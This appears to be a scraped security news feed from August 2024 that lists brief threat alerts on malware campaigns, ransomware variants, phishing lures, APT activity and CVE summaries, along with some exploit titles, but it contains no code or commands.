VIRUSPupy RAT malware has been reported to be distributed in a new campaign attributed to the UTG-Q-010 threat group. The attackers leverage phishing messages containing cryptocurrency lures or emails masqueraded as job resumes. The attack chain involves the use of malicious .lnk files with an embedded DLL loader, ending up in Pupy RAT payload deployment.

16.8.24

Discovery of tools and batch scripts targeting Windows and Linux systems

ALERTS

HACKINGAccording to a recent DFIR report, a range of threat actor tools has been found that can bypass security defenses like Windows Defender and Malwarebytes, delete backups, and disable systems. Among the discovered tools were Ngrok for proxy services and SystemBC, along with two well-known command-and-control frameworks: Sliver and PoshC2.

16.8.24

Malspam attacks target AnyDesk and Microsoft Teams

ALERTS

VIRUSResearchers recently found another campaign which starts with an email bomb and then involves a phone call via Microsoft Teams. The attacker persuades victims to download AnyDesk, a remote access tool, which allows them to take control of the victim's computer. Once they have control, the attacker runs malicious payloads and steals data from the system.

16.8.24

New macOS malware uses SwiftUI and OpenDirectory API for credential theft

ALERTS

VIRUS
A new multi-stage macOS stealer malware has been recently reported. The malware exhibits many traits such as the following:

16.8.24

.shop gTLD becomes a new favorite to spread waves of cryptocurrency spam emails

ALERTS

SPAMLately, .shop gTLD has been heavily abused by threat actors to spread cryptocurrency spam emails. Shop gTLD (generic top-level domain) was launched in 2016 and is specially designed for online shopping or e-commerce platforms and can be used by retailers and e-commerce stores, among others.

16.8.24

Datablack ransomware

ALERTS

RANSOMDatablack is a new ransomware variant observed in the wild. The malware exhibits similarities to ransomware strains from the Proton malware family. Datablack encrypts user files and appends .Datablack extension to the renamed file name. The ransom note is dropped in form of a text file called #Recovery.txt, where attackers ask the victims to contact them via email addresses provided for further instructions regarding data decryption.

16.8.24

Gigabud mobile malware shows links to the Golddigger trojan

ALERTS

VIRUSA new variant of the Gigabud Android malware has been observed in the wild. While the initial strain of this malware has been known since at least 2023, the distribution of the new variant has expanded and now it targets various countries across the world. The malware is often spread via phishing websites masqueraded as Google Play Store or sites impersonating various banks or governmental entities.

16.8.24

CVE-2024-38856 - Apache OFBiz Pre-Authentication RCE vulnerability

ALERTS

VULNEREBILITYCVE-2024-38856 is a recently disclosed critical (CVSS score 9.8) pre-authentication remote code execution vulnerability affecting Apache OFBiz versions up to 18.12.14. The vulnerability originates from a flaw in the override view functionality. Once exploited it allows unauthenticated attackers with remote code execution via crafted requests.

16.8.24

Allarich Ransomware

ALERTS

RANSOMA new ransomware dubbed Allarich has emerged recently in the ransomware landscape. It encrypts files, appending the ".allarich" extension to them, and changes the desktop wallpaper. After completing the encryption process, the ransomware generates a ransom note titled "README.txt."

16.8.24

Phishing campaign impersonates Google Safety Centre

ALERTS

CAMPAIGNA phishing campaign reportedly impersonating the Google Safety Centre is deceiving users into downloading a malicious file disguised as Google Authenticator. This file installs two types of malware: Latrodectus, a downloader that executes commands from a C&C server, and ACR Stealer, which employs Dead Drop Resolver to obscure its C&C server details. The campaign showcases advanced evasion techniques amid ongoing efforts to refine the malware.

16.8.24

Actor240524's spear-phishing campaign targets Azerbaijan and Israel with ABCloader

ALERTS

GROUPA spear-phishing campaign by a new threat actor, Actor240524, targeting Azerbaijan and Israel has been observed. Users are lured with disguised government official documents containing embedded VBA macros that deliver the ABCloader payload upon execution. ABCloader decrypts and loads an ABCsync DLL, which then communicates with the C2 server for remote commands. The malware employs anti-sandbox and anti-debug techniques to evade detection.

16.8.24

Phishing Attack Delivers 0bj3ctivity Stealer via Discord CDN

ALERTS

PHISHINGA phishing attack has been reported involving the 0bj3ctivity Stealer, facilitated by the Ande Loader. The attack uses a Discord CDN link containing a malicious JavaScript file with an embedded PowerShell script to deploy additional payloads. The Ande Loader is used for both initial infection and persistence. The stealer exfiltrates sensitive data from browsers to either Telegram or a C2 server and includes anti-debug and anti-VM capabilities.

16.8.24

Grayfly evolves its attack vectors with new loaders and tactics

ALERTS

VIRUSGrayfly(also known as Earth Baku) has been observed expanding its reach from the Indo-Pacific region to a global scale, targeting sectors such as healthcare, media, government, education, and more. In a recent campaign, the threat actor leveraged public-facing applications like IIS servers for initial access and deployed the Godzilla webshell for control.

16.8.24

DeathGrip: Emergence of a new Ransomware-as-a-Service

ALERTS

RANSOMA new Ransomware-as-a-Service (RaaS) called DeathGrip ransomware has emerged in the expanding ransomware threat landscape. Promoted through Telegram and other underground forums, DeathGrip RaaS offers aspiring threat actors on the dark web sophisticated ransomware tools, including LockBit 3.0 and Chaos builders. Their payloads, created using leaked ransomware builders, are already being observed in real-world attacks, enabling individuals with minimal technical skills to deploy fully developed ransomware attacks.

16.8.24

Spoofed Australian Taxation Office (ATO) email notifications appear in phish runs

ALERTS

SPAMThe Australian Taxation Office (ATO) is Government of Australia's revenue collection authority. Recently, Symantec has observed phishing attempts mimicking ATO, enticing users to open fake notification emails. The email mentions that a notice of assessment requires user's immediate attention due to an ongoing scheduled maintenance.

16.8.24

CVE-2024-40628/CVE-2024-40629 - JumpServer File Read and Upload vulnerabilities

ALERTS

VULNEREBILITYCVE-2024-40628  and CVE-2024-40629 are recently disclosed file reading and uploading vulnerabilities affecting the JumpServer Ansible module. Successful exploitation of the flaw might allow low-privilege accounts with access to read/write files in the Celery container, posing both risk of sensitive information disclosure as well as potential arbitrary code execution within the context of the affected application.

16.8.24

Phishers targeting users in South Korea with tax receipts

ALERTS

PHISHINGSymantec has observed a phishing campaign targeting users in South Korea. The attack attempts to impersonate major account firms sending tax receipts/invoices in order to lure recipients into opening the attachment. The attachment, likely in a bid to fool intended victims, also shares a name with the Nation Tax Service in South Korea, 'NTS_eTaxInvoice.html'

15.8.24

CVE-2024-38173VULNEREBILITYCVEMicrosoft Outlook Remote Code Execution Vulnerability

15.8.24

CVE-2024-38198VULNEREBILITYCVEWindows Print Spooler Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38202VULNEREBILITYCVE(CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability

15.8.24

CVE-2024-21302VULNEREBILITYCVE(CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38199VULNEREBILITYCVE(CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability

15.8.24

CVE-2024-38213VULNEREBILITYCVE(CVSS score: 6.5) - Windows Mark of the Web Security Feature Bypass Vulnerability

15.8.24

CVE-2024-38107VULNEREBILITYCVE(CVSS score: 7.8) - Windows Power Dependency Coordinator Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38106VULNEREBILITYCVE(CVSS score: 7.0) - Windows Kernel Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38193VULNEREBILITYCVE(CVSS score: 7.8) - Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38178VULNEREBILITYCVE(CVSS score: 7.5) - Windows Scripting Engine Memory Corruption Vulnerability

15.8.24

CVE-2024-38189VULNEREBILITYCVE(CVSS score: 8.8) - Microsoft Project Remote Code Execution Vulnerability

15.8.24

CVE-2024-7570 VULNEREBILITYCVE(CVSS score: 8.3) - Improper certificate validation in Ivanti ITSM on-prem and Neurons for ITSM Versions 2023.4 and earlier allows a remote attacker in a MITM position to craft a token that would allow access to ITSM as any user

15.8.24

CVE-2024-7569VULNEREBILITYCVE(CVSS score: 9.6) - An information disclosure vulnerability in Ivanti ITSM on-prem and Neurons for ITSM versions 2023.4 and earlier allows an unauthenticated attacker to obtain the OIDC client secret via debug information

15.8.24

Actor240524GROUPAPTNew APT Group Actor240524: A Closer Look at Its Cyber Tactics Against Azerbaijan and Israel

15.8.24

ArtiPACKEDHACKINGHACKINGArtiPACKED: Hacking Giants Through a Race Condition in GitHub Actions Artifacts

15.8.24

RansomHubRANSOMWARERANSOMWARERansomware attackers introduce new EDR killer to their arsenal

15.8.24

Gafgyt BOTNETBOTNETGafgyt Malware Variant Exploits GPU Power and Cloud Native Environments

15.8.24

River of Phish CAMPAIGNPhishingSPEAR-PHISHING CASES FROM EASTERN EUROPE 2022-2024A TECHNICAL BRIEF

15.8.24

CVE-2024-5916VULNEREBILITYCVE(CVSS score: 6.0) - An information exposure vulnerability in PAN-OS software that enables a local system administrator to access secrets, passwords, and tokens of external systems

15.8.24

CVE-2024-5915VULNEREBILITYCVE(CVSS score: 5.2) - A privilege escalation (PE) vulnerability in the GlobalProtect app on Windows devices that enables a local user to execute programs with elevated privileges

15.8.24

CVE-2024-28986VULNEREBILITYCVESolarWinds Web Help Desk Java Deserialization Remote Code Execution Vulnerability (CVE-2024-28986)

15.8.24

Earth BakuCAMPAIGNCAMPAIGNA Dive into Earth Baku’s Latest Campaign

15.8.24

GhostWritePAPERSCPURISCVuzz: Discovering Architectural CPU Vulnerabilities via Differential Hardware Fuzzi

15.8.24

GhostWriteVULNEREBILITYCPURISCVuzz: Discovering Architectural CPU Vulnerabilities via Differential Hardware Fuzzi

13.8.24

CVE-2024-33892VULNEREBILITYCVE(CVSS score: 7.4) - Information leakage through cookies

13.8.24

CVE-2024-33893VULNEREBILITYCVE(CVSS score: 2.1) - XSS when displaying the logs due to improper input sanitization

13.8.24

CVE-2024-33894VULNEREBILITYCVE(CVSS score: 1.0) - Execution of several processes with elevated privileges

13.8.24

CVE-2024-33895VULNEREBILITYCVE(CVSS score: 4.4) - Usage of a unique key to encrypt the configuration parameters

13.8.24

CVE-2024-33896VULNEREBILITYCVE(CVSS score: 3.3) - Code injection due to improper parameter blacklisting

13.8.24

CVE-2024-33897VULNEREBILITYCVE(CVSS score: N/A) - A compromised devices could be used to request a Certificate Signing Request (CSR) from Talk2m for another device, resulting in an availability issue

13.8.24

Compromising Microsoft's AI Healthcare Chatbot ServiceINCIDENTAITenable Research discovered multiple privilege-escalation issues in the Azure Health Bot Service via a server-side request forgery (SSRF), which allowed researchers access to cross-tenant resources.

13.8.24

CVE-2024-7589VULNEREBILITYCVEOpenSSH is an implementation of the SSH protocol suite, providing an encrypted and authenticated transport for a variety of services, including remote shell access.

13.8.24

APT trends report Q2 2024ANALÝZAAPTFor over six years now, Kaspersky’s Global Research and Analysis Team (GReAT) has been sharing quarterly updates on advanced persistent threats (APTs).

11.8.24

Devika v1 - Path Traversal via 'snapshot_path'

Exploit

WebAppsPython

11.8.24

Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

Exploit

LocalWindows

11.8.24

SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path

Exploit

LocalWindows

11.8.24

Oracle Database 12c Release 1 - Unquoted Service Path

Exploit

LocalWindows

11.8.24

Ivanti vADC 9.9 - Authentication Bypass

Exploit

WebAppsMultiple

11.8.24

Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege EscalationExploitLocalWindows

11.8.24

QuickShellEXPLOITEXPLOITQuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share

11.8.24

CVE-2024-38272VULNEREBILITYCVE(CVSS score: 7.1) - A vulnerability that allows an attacker to bypass the accept file dialog on Windows

11.8.24

CVE-2024-38271

VULNEREBILITY

CVE

(CVSS score: 5.9) - A vulnerability that forces a victim to stay connected to a temporary Wi-Fi connection created for sharing

11.8.24

2024-08-08 - Sixteen days of server scans and probes MALWARE TRAFFICMALWARE TRAFFICZip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

11.8.24

2024-07-23 - Eight days of server scans and probesMALWARE TRAFFICMALWARE TRAFFICZip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

10.8.24

Breaching AWS Accounts Through Shadow ResourcesVULNEREBILITYCVEThe cloud seems complex, but it's what happens behind the scenes that really complicates things. Some services utilize others as resources as part of their logic/operation. Interestingly enough, it turns out that this could lead to catastrophic results if done unsafely.

10.8.24

CVE-2024-38200

VULNEREBILITY

CVE

Microsoft Office Spoofing Vulnerability

10.8.24

CVE-2024-27459

VULNEREBILITY

CVE

The interactive service in OpenVPN 2.6.9 and earlier allows an attacker to send data causing a stack overflow which can be used to execute arbitrary code with more privileges.

10.8.24

CVE-2024-24974

VULNEREBILITY

CVE

The interactive service in OpenVPN 2.6.9 and earlier allows the OpenVPN service pipe to be accessed remotely, which allows a remote attacker to interact with the privileged OpenVPN interactive service.

10.8.24

CVE-2024-27903

VULNEREBILITY

CVE

OpenVPN plug-ins on Windows with OpenVPN 2.6.9 and earlier could be loaded from any directory, which allows an attacker to load an arbitrary plug-in which can be used to interact with the privileged OpenVPN interactive service.

10.8.24

CVE-2024-1305

VULNEREBILITY

CVE

tap-windows6 driver version 9.26 and earlier does not properly check the size data of incomming write operations which an attacker can use to overflow memory buffers, resulting in a bug check and potentially arbitrary code execution in kernel space

10.8.24

OpenVPN vulnerabilities

VULNEREBILITY

CVE

Chained for attack: OpenVPN vulnerabilities discovered leading to RCE and LPE

10.8.24

CVE-2023-50809

VULNEREBILITY

CVE

A vulnerability in the Sonos One Gen 2 Wi-Fi stack that does not properly validate an information element while negotiating a WPA2 four-way handshake, leading to remote code execution

10.8.24

CVE-2023-50810

VULNEREBILITY

CVE

In certain Sonos products before Sonos S1 Release 11.12 and S2 release 15.9, a vulnerability exists in the U-Boot component of the firmware that allow persistent arbitrary code execution with Linux kernel privileges. A failure to correctly handle the return value of the setenv command can be used to override the kernel command-line parameters and ultimately bypass the Secure Boot implementation. This affects PLAY5 gen 2, PLAYBASE, PLAY:1, One, One SL, and Amp.

10.8.24

Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities

VULNEREBILITY

CVE

Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an attacker to execute arbitrary commands on the underlying operating system or cause a denial of service (DoS) condition.

9.8.24

English-Spanish Speaking Ransomware Actor Targets Linux Machines

ALERTS

RANSOMSymantec has recently observed a Linux Ransomware variant binary that appears to be connected to a English and Spanish-speaking Double-extortion Ransomware actor. At this time, their modus-operandi remains unclear, but the ransomware exhibits the following behavior. 

9.8.24

Cryptocurrency-themed lure sites used for phishing attacks

ALERTS

CRYPTOCURRENCYThreat actors are creating thousands of cryptocurrency-themed lure sites used for phishing attacks that target users of cryptocurrency wallet brands like MetaMask, WalletConnect, Coinbase, Trezor, Ledger, Bitget, Exodus, Phantom, and others. These actors are using free hosting services such as Gitbook and Webflow to create lure sites on crypto wallet typo-squatter subdomains like the following.

9.8.24

New malspam campaigns delivering multiple Trojans

ALERTS

SPAMA number of malspam campaigns were seen which delivered various Trojans by attempting to exploit an old Microsoft Office vulnerability. CVE-2017-0199 is still targeted to allow for execution of remote code from within an XLS file. The campaigns delivered a malicious XLS file with a link from which a remote HTA or RTF file would be executed to download the final payload. We observed GuLoader, Remcos RAT, and Sankeloader infostealer as payloads.

9.8.24

Sora AI-themed branding used to distribute malware

ALERTS

AI  Threat Actors have created various phishing sites that impersonate official Sora platforms to lure victims into downloading files disguised as legitimate Sora software in order to distribute harmful payloads, including data stealers and cryptocurrency miners. When users attempt to install what is believed to be authentic application(s), the files trigger malicious processes that compromise the victim’s system.

9.8.24

Phish emails impersonate UK's Health and Safety Executive (HSE) to lure email users

ALERTS

PHISHINGHealth and Safety Executive (HSE) is a British public provider of health and safety solutions to various professionals and organizations. Lately, Symantec has observed phish runs that impersonate Health and Safety Executive (HSE) guidelines, especially the strategy outlined for 2022-2032, to steal credentials.

9.8.24

New file-less ransomware variant Cronus discovered

ALERTS

RANSOMA new file-less ransomware variant dubbed Cronus has been reported as part of a malware campaign. Users are lured with documents masquerading as PayPal receipts. These documents contain malicious embedded VBA macros that, when executed, download a PowerShell loader. The loader then uses reflective DLL loading to deploy the ransomware DLL, aiming to evade detection.

9.8.24

RHADAMANTHYS Stealer Targeting Users in Israel

ALERTS

VIRUSRHADAMANTHYS stealer, active since 2013 and offered as Malware-as-a-Service, recently began targeting Israeli users with Hebrew phishing emails containing a malicious RAR attachment. The RAR file, posing as a notification from "Calcalist" or "Mako," (two prominent businesses in Israel) extracts three components - a malicious executable, a DLL file, and a support file. Upon execution, RHADAMANTHYS employs anti-analysis techniques to avoid detection and initiates a multi-staged infection process to establish a presence on the compromised system.

9.8.24

0.0.0.0 DayEXPLOITEXPLOIT0.0.0.0 Day: Exploiting Localhost APIs From the Browser

9.8.24

Downgrade AttacksHACKINGAttackWindows Downdate: Downgrade Attacks Using Windows Updates

9.8.24

CVE-2024-21302

VULNEREBILITY

CVE

(CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability

9.8.24

CVE-2024-38202

VULNEREBILITY

CVE

(CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability

9.8.24

StopRansomware BlackSuit (Royal) RansomwareRANSOMWARERANSOMWAREThe advisory was updated to notify network defenders of the rebrand of “Royal” ransomware actors to “BlackSuit.” The update includes new TTPs, IOCs, and detection methods related to BlackSuit ransomware. “Royal” was updated to “BlackSuit” throughout unless referring to legacy Royal activity. Updates and new content are noted.

9.8.24

CVE-2024-4885

VULNEREBILITY

CVE

In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with iisapppool\nmconsole privileges.

8.8.24

SbaProxy leveraged to hijack legitimate antivirus software

ALERTS

EXPLOITA recent report detailed how threat actors are leveraging a tool dubbed 'SbaProxy' disguised as a legitimate anti-virus software component to be able to create a proxy connection through a C2 server. The tool is distributed with malicious intent and in multiple formats such as DLLs, EXEs, and PowerShell scripts, which makes it challenging to detect due to its authentic look and advanced functionality. 

8.8.24

Lynx Ransomware

ALERTS

RANSOMLynx is another double-extortion ransomware actor that has been fairly active in recent weeks and has claimed multiple companies as victims on their website. They claim to have a strict policy against targeting governmental organizations, hospitals, non-profits, and other sectors vital to society.

8.8.24

Malware campaign exploits secureserver.net domain to deploy banking trojan

ALERTS

CAMPAIGNA new banking trojan malware campaign is exploiting the secureserver.net domain to target Spanish and Portuguese-speaking regions. The multistage attack begins with malicious URLs leading to an archive containing an obfuscated .hta file.

8.8.24

Chameleon trojan targets hospitality Industry

ALERTS

VIRUSA new Chameleon mobile banking Trojan campaign has been reported targeting the hospitality industry. Employees of a Canadian restaurant chain with international operations were lured by a deceptive app masquerading as a legitimate CRM application.

8.8.24

Zola - a new Proton ransomware variant

ALERTS

RANSOMZola is a recently discovered variant from the Proton ransomware family. The ransomware is written in C++ and employs a multi-threaded encryption process. Upon encryption the malware appends .zola extension to the encrypted files. Zola will also attempt to encrypt files on any network devices if present.

8.8.24

How Malicious Actors Are Leveraging Cloud Services

ALERTS

GROUPThe number of threat actors leveraging legitimate cloud services in their attacks has grown this year as attackers have begun to realize their potential to provide low-key and low-cost infrastructure. Traffic to and from well known, trusted services such as Microsoft OneDrive or Google Drive may be less likely to raise red flags than communications with attacker-controlled infrastructure.

8.8.24

Italian campaign targeting certified email users delivers Vidar infostealer

ALERTS

CAMPAIGNThe Vidar infostealer has been observed as the payload of a recent malspam campaign targeting users in Italy. The campaign was distributed to users of certified email mailboxes and delivered a JavaScript downloader via a link in the email. The JavaScript was responsible for downloading and executing a PowerShell script which in turn leads to the final payload.

8.8.24

Mispadu (aka URSA) Trojan Malware

ALERTS

VIRUSMispadu Stealer (aka Ursa) was recently observed in another malspam campaign targeting systems configured with Spanish or Portuguese as their language settings. Similar to their previous campaigns, a spam email themed as an overdue invoice serves as the initial vector, it then lures users to download a malicious ZIP file.

7.8.24

SLUBStickEXPLOITLinuxSLUBStick: Arbitrary Memory Writes through Practical Software Cross-Cache
Attacks within the Linux Kernel

7.8.24

CVE-2024-42008

VULNEREBILITY

CVE

A cross-site scripting flaw via a malicious email attachment served with a dangerous Content-Type header

7.8.24

CVE-2024-42009

VULNEREBILITY

CVE

A cross-site scripting flaw that arises from post-processing of sanitized HTML content

7.8.24

CVE-2024-42010

VULNEREBILITY

CVE

An information disclosure flaw that stems from insufficient CSS filtering

7.8.24

GoGraMALWAREBackdoorCloud Cover: How Malicious Actors Are Leveraging Cloud Services

7.8.24

CrowdStrike RevealsINCIDENTINCIDENTExternal Technical Root Cause Analysis — Channel File 29

7.8.24

Chameleon MALWAREMobil TrojanChameleon is back in Canada and Europe

7.8.24

XDSpy phishing campaign targets organizations in Russia and Moldova

ALERTS

PHISHINGA phishing malware campaign by a threat actor dubbed XDSpy has been reported targeting organizations in Russia and Moldova. The attack chains typically use spear-phishing emails with archive attachments containing agreement-related lures to deploy a primary malware module called XDDown.

7.8.24

Spike in activity delivering Magniber ransomware

ALERTS

RANSOMA spike in activity leading up to the infection with the Magniber ransomware has been observed in the wild. Attackers spreading this malware variant are known to leverage various delivery methods including malvertisements, delivery via cracked software installers or exploitation of known vulnerabilities, etc.

7.8.24

OSX and Windows malware spread under the disguise of meeting or productivity software

ALERTS

VIRUSOngoing campaigns spreading malware under the disguise of meeting or productivity applications have been reported in the wild. Some recent examples include attacks masquerading under the productivity app called Wasper or the Clusee meeting application.

7.8.24

HeadLace backdoor distributed by the Swallowtail APT

ALERTS

VIRUSThe latest research from Palo Alto reports on recent HeadLace backdoor distribution campaign being attributed to the Swallowtail APT (aka Fighting Ursa, APT28). The attackers have been leveraging car-for-sale phishing lures in efforts to distribute the malicious payloads.

7.8.24

Persistent IRATA attacks in Italy

ALERTS

SPAMTheir modus operandi hasn't changed much over that period; they mainly leverage malicious SMS (smishing) messages containing URL redirections to their malicious apps as the vector of infection. They constantly rotate their social engineering tactics, with Symantec having observed multiple Italian financial services being abused for masquerading purposes.

7.8.24

Are faxes still relevant? This credential harvesting campaign thinks so

ALERTS

CAMPAIGNSymantec has recently observed a phishing campaign impersonating fax notifications. These notifications include subjects similar to 'Incoming Fax Delivered for user**@****.com' and instructs users to open the attached HTML and enter their credentials in order to view the fax.

7.8.24

Lumma Stealer via Social Media and AI-Related Lure

ALERTS

VIRUSThere's been reports of a malvertising scam in which cybercriminals hijacked social media pages to promote fake AI photo editors, ultimately tricking users into downloading a prevalent but run-of-the-mill stealer known as Lumma.

7.8.24

Trust (Crypto) Wallet users targeted with a new phishing wave

ALERTS

CRYPTOCURRENCYTrust Wallet is a crypto wallet that provides its users services such as buying, selling, storing, swapping and managing their cryptocurrencies. Lately, Symantec has observed phish runs that impersonate Trust Wallet services and entice users to open fake notification emails.

7.8.24

BITSLOTH Backdoor

ALERTS

VIRUSBITSLOTH is a Windows backdoor that researcher have uncovered in Latin America that exploits the Background Intelligent Transfer Service (BITS) for command-and-control operations. According to the report, it has been developed over several years, can log keystrokes, capture screens, and gather extensive data.

6.8.24

Moonstone SleetGROUPGROUPStressed Pungsan: DPRK-aligned threat actor leverages npm for initial access
6.8.24CVE-2024-38856

VULNEREBILITY

CVE

Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue.

6.8.24

Android Security Bulletin—August 2024OSAndroidThe Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-08-05 or later address all of these issues.
6.8.24LianSpyMALWAREAndroidLianSpy: new Android spyware targeting Russian users

5.8.24

STRRATMALWARERATBloody Wolf strikes organizations in Kazakhstan with STRRAT commercial malware

5.8.24

CVE-2024-6242ICSVulnerebilityRockwell Automation Logix Controllers

5.8.24

BlankBot MALWAREAndroid BankingBlankBot - a new Android banking trojan with screen recording, keylogging and remote control capabilities

5.8.24

StormBambooMALWAREBackdoorStormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms

4.8.24

PanamorfiCAMPAIGNDDOSA New Discord DDoS Campaign

3.8.24

Increased Activity Against Apache OFBiz CVE-2024-32113SANSSANSAs part of its extensive project portfolio, the Apache Foundation supports OFBiz, a Java-based framework for creating ERP (Enterprise Resource Planning) applications. OFBiz appears to be far less prevalent than commercial alternatives. However, just as with any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.

3.8.24

APT28APTAPTToday, APT28 is consistently attributed to GRU Unit 26165, 85th Main Special Service Centre (GTsSS) of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU/GRU). This attribution is mainly based on an indictment unsealed by the US Department of Justice (DoJ) in 2018.

3.8.24

Fighting UrsaAPTAPTA Russian threat actor we track as Fighting Ursa advertised a car for sale as a lure to distribute HeadLace backdoor malware. The campaign likely targeted diplomats and began as early as March 2024. Fighting Ursa (aka APT28, Fancy Bear and Sofacy) has been associated with Russian military intelligence and classified as an advanced persistent threat (APT).

3.8.24

APT41APTAPTAPT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

3.8.24

BITSLOTHMALWAREBackdoorBITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor

3.8.24

BlankBot Mobile banking trojan targeting Turkish users

ALERTS

VIRUSBlankBot is a new mobile banking Trojan variant that has emerged on the threat landscape, primarily targeting Turkish users. BlankBot abuses Android Accessibility services to gain full control over and collect information from the infected device.

3.8.24

NetSupport RAT Campaign

ALERTS

VIRUSNetSupport Manager has been weaponized by threat actors to perform malicious activities and executes as a Remote Access Trojan (RAT). Over time various campaigns have been identified each instance building on the previous in attempts to evolve evasion techniques through multiple obfuscation updates. 

3.8.24

AutoIT scripts leveraged by the latest Konni RAT malware

ALERTS

VIRUSKonni RAT malware observed in a recent distribution campaign has been leveraging AutoIT scripts for detection evasion. The attack chain includes the use of .LNK files contained within .zip archives. The .lnk shortcut files are often disguised as documents and have double extensions present, for example ".hwp.lnk".

3.8.24

Spike of activity observed for the Neshuta malware

ALERTS

VIRUSDuring the last month Symantec observed a spike of activity attributed to the Neshuta (aka Neshta) malware family. Neshuta is an older file infector variant that's been observed in the threat landscape space as early as 2005. It's main function is to prepend virus code to executable files and collect basic system information.

3.8.24

Grayfly (aka APT41) threat group deploying ShadowPad and Cobalt Strike in a recent attacks

ALERTS

APTAs reported by researchers from Cisco Talos, Grayfly threat group (also known as APT41) has been deploying ShadowPad malware and Cobalt Strike beacons in a recent distribution campaign observed in Taiwan. The attackers have been reported to exploit an old and vulnerable version of Microsoft Office IME file (imecmnt.exe) for the purpose of second-stage loader and payload execution.

3.8.24

Bloody Wolf delivers STRRAT malware

ALERTS

VIRUSA malware campaign by the APT group dubbed Bloody Wolf targeting organizations in Kazakhstan has been reported. The attackers are sending phishing emails that impersonate the Ministry of Finance of the Republic of Kazakhstan and other agencies.

3.8.24

Mandrake mobile spyware

ALERTS

VIRUSA new variant of the Mandrake mobile spyware has been distributed via several apps hosted on the Google Play store. The oldest of the apps called AirFS was first uploaded to the store back in 2022 and remained available for download up until March this year.

3.8.24

TgRAT malware returns with a Linux variant

ALERTS

VIRUSTgRAT is a malware variant discovered back in 2022 and initially targeting the Windows systems. Earlier this month a Linux version of this RAT has been observed as being distributed in the wild. Upon infection of the targeted machine the malware is used to execute arbitrary commands/scripts, collect screenshots or extract user files from the compromised host. TgRAT is controlled by the attackers via a Telegram bot

2.8.24

SARA Android Ransomware Targets Vietnamese Mobile Users in Fake App Scheme

ALERTS

RANSOMAndroid lockers and ransomware were prevalent a couple of years ago, especially during the RansomLock craze. Today, while they remain in the mobile threat landscape, their prevalence has dwindled. These threats typically lock users out of their devices and display a ransom message, demanding payment to regain access with an unlock code.

2.8.24

DeerStealer malware spread via fake Google Authenticator websites

ALERTS

VIRUSA new malicious campaign distributing infostealer variant dubbed DeerStealer has been identified in the wild. The malware is spread under the disguise of fake Google Authenticator app and the malicious binary is hosted on the Github repository.

2.8.24

SMS Stealer - extensive Android malware distribution campaign

ALERTS

VIRUSAn ongoing large-scale operation distributing a Android malware variant called SMS Stealer has been reported to infect mobile devices across the world. The campaign has been active since at least 2022 and targeting victims in 113 countries.

2.8.24

ModiLoader malware campaign targeting Small and Medium-Sized Business (SMB) in Poland

ALERTS

VIRUSModiloader (aka DBatLoader) malware has been deployed in a recent campaigns targeting Small and Medium-Sized Business (SMB) in Poland, Italy and Romania. Modiloader has been spread via malicious email attachments in various file formats such as .img, .tar, .rar or .iso. Modiloader is a Delphi-based malware used to download and execute final payloads delivered to the compromised machines. The payload usually varies and the reported campaigns have been executing malware from Agent Tesla, Remcos or Formbook families.

2.8.24

DoNot APT Targeting Pakistani Android Mobile Users

ALERTS

APTAPT-C-35 (aka DoNot APT Group) has been active in conducting cyberattacks since at least 2013. Recently, they have targeted Pakistani Android mobile users. Their attacks typically start with phishing campaigns, leading to the deployment of Android malware known as StealJob. The primary objective of these threat actors is to access confidential information and intellectual property. Their techniques include encryption and fileless malware to evade detection.

2.8.24

Protection Highlight: Ransomware-as-a-Service Evolution, Impact, Mitigation

ALERTS

RANSOMMalware evolution in the threat landscape is the singular reason cybersecurity professionals can’t rest, and Ransomware-as-a-Service (RaaS) is no different. From its first known form in 2012 as Reveton to the most recent inception of Eldorado ransomware, with early incidents reportedly raking in amounts of $400K USD a month to modern-day data breaches costing over $1M and sometimes far in excess of that figure.

2.8.24

Leafperforator campaign exploits Pakistan’s Maritime Affairs documents to spread JavaScript malware

ALERTS

CAMPAIGNA new malware campaign by the Leafperforator (also known as SideWinder) threat actor, utilizing enhanced tactics and techniques has been reported. This threat actor relies on spear-phishing emails and targets Asian countries. In the latest campaign, users are tricked with documents related to employee termination or salary cuts, leading them to open a disguised file. This file exploits a known security flaw (CVE-2017-0199) to establish contact with a malicious domain masquerading as Pakistan's Directorate General Ports and Shipping. The domain then retrieves an RTF file exploiting CVE-2017-11882, leading to the delivery of JavaScript malware.

2.8.24

Phishing Campaign: Malicious HTML attachment mimics OneDrive to deploy malware Scripts

ALERTS

PHISHINGA new phishing campaign using image files that mimic a Microsoft OneDrive page has been reported. Users are targeted through phishing emails with HTML attachments. When these attachments are opened, they display an image resembling a OneDrive page and show an error indicating a connection issue with the OneDrive cloud service.

2.8.24

Recent activities attributed to the UNC4393 threat group

ALERTS

